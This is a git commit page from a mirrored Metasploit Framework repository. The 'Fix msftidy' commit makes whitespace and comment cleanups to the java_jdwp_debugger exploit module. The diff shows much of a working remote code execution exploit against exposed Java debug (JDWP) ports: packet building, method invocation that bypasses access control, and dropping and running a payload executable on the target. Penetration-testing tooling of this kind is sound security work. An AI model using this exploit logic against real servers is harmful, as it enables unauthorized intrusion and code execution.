infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix msftidy

bug/bundler_fix
Julian Vilas 2014-05-30 00:14:59 +02:00
parent 9627bae98b
commit 60c5307475
1 changed files with 50 additions and 51 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

101
modules/exploits/multi/misc/java_jdwp_debugger.rb Executable file → Normal file
View File

@ -73,7 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
to execute code remotely.
},
'Author' => [
'Christophe Alladoum', # Exploit
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
],
@ -164,17 +163,17 @@ class Metasploit3 < Msf::Exploit::Remote
flags = 0x00
cmdset, cmd = cmdsig
pktlen = data.length + 11
buf = [pktlen, @myid, flags, cmdset, cmd]
pkt = buf.pack("NNCCC")
pkt << data
@myid += 2
return pkt
end
@ -230,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Packs normal string into string structure for target VM
# Packs normal string into string structure for target VM
def build_string(data)
ret = [data.length].pack('N')
ret << data
@ -263,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Unknown format")
end
# Parses given data according to a set of formats
# Parses given data according to a set of formats
def parse_entries(buf, formats, explicit=true)
entries = []
@ -275,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
nb_entries.times do |var|
print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0
data = {}
@ -316,16 +315,16 @@ class Metasploit3 < Msf::Exploit::Remote
# Gets the sizes of variably-sized data types in the target VM
def idsizes
sock.put(create_packet(IDSIZES_SIG))
response = read_reply(datastore['RESPONSE_TIMEOUT'])
formats = [
["I", "fieldid_size"],
["I", "methodid_size"],
["I", "objectid_size"],
["I", "referencetypeid_size"],
["I", "frameid_size"]
formats = [
["I", "fieldid_size"],
["I", "methodid_size"],
["I", "objectid_size"],
["I", "referencetypeid_size"],
["I", "frameid_size"]
]
entries = parse_entries(response, formats, false)
@ -346,12 +345,12 @@ class Metasploit3 < Msf::Exploit::Remote
response = read_reply(datastore['RESPONSE_TIMEOUT'])
formats = [
["S", "descr"],
["I", "jdwp_major"],
["I", "jdwp_minor"],
["S", "vm_version"],
["S", "vm_name"]
formats = [
["S", "descr"],
["I", "jdwp_major"],
["I", "jdwp_minor"],
["S", "vm_version"],
["S", "vm_name"]
]
entries = parse_entries(response, formats, false)
@ -379,11 +378,11 @@ class Metasploit3 < Msf::Exploit::Remote
response = read_reply(datastore['RESPONSE_TIMEOUT'])
formats = [
["C", "reftype_tag"],
formats = [
["C", "reftype_tag"],
[@vars["referencetypeid_size"], "reftype_id"],
["S", "signature"],
["I", "status"]
["S", "signature"],
["I", "status"]
]
print_status("#{peer} - Parsing list of classes...")
@ -394,7 +393,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Checks if specified class is currently loaded by the target VM and returns it
def get_class_by_name(name)
@classes.each { |entry_array|
entry_array.each { |entry|
@ -406,7 +405,7 @@ class Metasploit3 < Msf::Exploit::Remote
nil
end
# Returns information for each method in a reference type (ie. object). Inherited methods are not included.
# Returns information for each method in a reference type (ie. object). Inherited methods are not included.
# The list of methods will include constructors (identified with the name "<init>")
def get_methods(reftype_id)
@ -418,11 +417,11 @@ class Metasploit3 < Msf::Exploit::Remote
response = read_reply(datastore['RESPONSE_TIMEOUT'])
formats = [
[@vars["methodid_size"], "method_id"],
["S", "name"],
["S", "signature"],
["I", "mod_bits"]
formats = [
[@vars["methodid_size"], "method_id"],
["S", "name"],
["S", "signature"],
["I", "mod_bits"]
]
@methods[reftype_id] = parse_entries(response, formats)
@ -458,16 +457,16 @@ class Metasploit3 < Msf::Exploit::Remote
target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method
fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method
return target_class, target_method
end
# Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
# Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
def str2fqclass(s)
i = s.rindex(".")
fail_with(Failure::BadConfig, 'Bad defined break class') unless i
@ -479,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote
classname << ';'
return classname, method
end
@ -494,7 +493,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Sets an event request. When the event described by this request occurs, an event is sent from the target VM
def send_event(event_code, args)
data = [event_code].pack('C')
data << [SUSPEND_ALL].pack('C')
data << [args.length].pack('N')
@ -517,7 +516,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Waits user defined time for an event sent from the target VM (or force event if possible)
# Waits user defined time for an event sent from the target VM (or force event if possible)
def wait_for_event
buf = read_reply(datastore['BREAK_TIMEOUT'])
@ -537,7 +536,7 @@ class Metasploit3 < Msf::Exploit::Remote
len = @vars["objectid_size"]
t_id = unformat(len,buf[10..10+len-1])
return r_id, t_id
end
@ -554,7 +553,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Invokes a static method. The method must be member of the class type or one of its superclasses,
# Invokes a static method. The method must be member of the class type or one of its superclasses,
# superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked.
def invoke_static(class_id, thread_id, meth_id, args = [])
@ -579,7 +578,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Invokes a instance method. The method must be member of the object's type or one of its superclasses,
# Invokes a instance method. The method must be member of the object's type or one of its superclasses,
# superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked.
def invoke(obj_id, thread_id, class_id, meth_id, args = [])
@ -631,7 +630,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def temp_path
return nil unless datastore['TMP_PATH']
unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
@ -643,11 +642,11 @@ class Metasploit3 < Msf::Exploit::Remote
# Configures payload according to targeted architecture
def setup_payload
# 1. Setting up generic values.
payload_exe = rand_text_alphanumeric(4 + rand(4))
pl_exe = generate_payload_exe
# 2. Setting up arch specific...
case target['Platform']
when 'linux'
@ -881,7 +880,7 @@ class Metasploit3 < Msf::Exploit::Remote
# 1. Prepares the payload
payload_exe, pl_exe = setup_payload
# 2. Creates file on server for dumping payload
file = create_file(thread_id, payload_exe)
@ -906,20 +905,20 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@myid = 0x01
@vars = {}
@classes = []
@methods = {}
@os = nil
check
connect
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake
# 1. Get the sizes of variably-sized data types in the target VM
idsizes
@ -966,4 +965,4 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
end
end
end